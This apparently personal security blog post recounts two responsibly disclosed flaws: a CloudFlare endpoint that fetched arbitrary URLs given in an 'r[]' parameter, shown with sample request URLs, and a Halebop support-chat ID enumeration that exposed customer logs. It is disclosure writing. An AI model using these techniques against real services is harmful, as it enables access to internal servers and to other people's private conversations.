On Twitter I wrote that I would declare the “coolest” solution the winner, and I think it’s the one from File Descriptor. Congratulations!

### Gateway to Heaven – a CloudFlare Vulnerability

CloudFlare is a service that sits between the Internet and its customers’ web servers, protecting them and speeding them up.

When I was visiting the web site of one of these customers I noticed something strange. The page was fetching content (JavaScript and CSSes) via a URL that looked something like this:

http://example.com/cdn-cgi/pe/bag?r[]=http://example.com/some.css&r[]=http://example.com/some.css

(If you, like me, always are looking for stuff that can be abused or misused, you have probably already guessed what comes next.)

I soon understood that this was CloudFlare functionality and not local to the website. I then immediately sent this mail to CloudFlare:

Hi,

Some days ago I submitted a vulnerability report to a site that I think is one of your customers. I don’t want to disclose their name at the moment as I am not sure they are OK with that. They might have been in contact with you already, since the problem seems to be with functionality you provide.

URL:
2) http://cloudflare.com/cdn-cgi/pe/bag?r[]=http%3A%2F%2Fyahoo.com

Description:
When these URLs are accessed, your server nicely gets the page in the r[] parameter and returns it in the response. Multiple instances of r[] in the same URL are also possible.

This could be exploited by someone who wants to access another URL, but anonymously (except for your logs of course), or to access pages “in your name”, making you look bad.

It could also be exploited in another, more serious way. If you happen to have any internal web servers that are not visible to the internet (for example a bug tracker), they might be visible to the computer hosting cloudflare.com. Then this vuln could be used to fetch files from the internal servers (given that the attacker knows the URLs or brute forces them).

A search on Google for this type of URL shows that many sites has the same problem. I don’t know if you can fix it in one place or if you have to roll it out to all these sites.

If you have any questions, please let me know.

In short, the vulnerability would allow an attacker to download content via a server acting as a gateway to the inside of CloudFlare, or to anywhere else.

After this, the whole experience was very smooth. John Roberts, Platform Lead at CloudFlare, who was my contact during the following discussion, was very nice about it all. CloudFlare does not have a reward program, but I was offered a T-shirt as a token of appreciation.

### Open Chat Conversations in Halebop Support (Fixed)

5 months ago I discovered that the Swedish telecom operator Halebop (a TeliaSonera operated brand) had a big problem in its support chat.

After ending a support session, the customer could access the log of the session for later reference via an URL on the form:

https://...halebop.se/...path?ID=[id]&_sid=[sid]

It turned out that the _sid parameter didn’t matter, and that it was possible to access other customers’ logs by changing the id parameter. This is called an Insecure Direct Object Reference in the OWASP Top Ten (thanks @avlidienbrunn). The id number I was looking at was higher than 2,500,000, which indicated that there could have been more than two and a half million support chat logs with potentially sensitive customer data open for anyone to read.

I asked on Twitter if anyone had a security contact at Halebop and got help almost immediately from @ilektrojohn, who knew someone on the inside. I mailed a report and it was forwarded to the incidence report team (IRT), since the contact at TeliaSonera I got in touch with was not working with this. I never got any response directly from the IRT, but was told by my contact that:

the official response was: “we do not encourage this sort of activity”

## However…

Before publishing this post I wanted to make sure that the vulnerability was fixed so I tried to access a support log and was rejected, as expected. But fortunately I did not remember to close the tab afterwards.

The next day, when I was doing some work from home and needed to use BURP (my proxy tool of choice) for once (I am a developer, not a security guy) I happened to notice something strange in the History tab. It looked like a support conversation! And it was.

Apparently the chat page used AJAX to update the current conversation at regular intervals, and it did this even though I was not allowed to see it on the page. My guess is that when they fixed the original vulnerability, they only did it at one place in the view layer, and not deeper down.

Naturally I had to report this flaw too, but this time my original contact was not available. Instead I asked Telia at Twitter for help. One week later the security team contacted me and this time they told me:

Thank you for taking the effort of finding and reporting this issue.

That’s what I want to hear!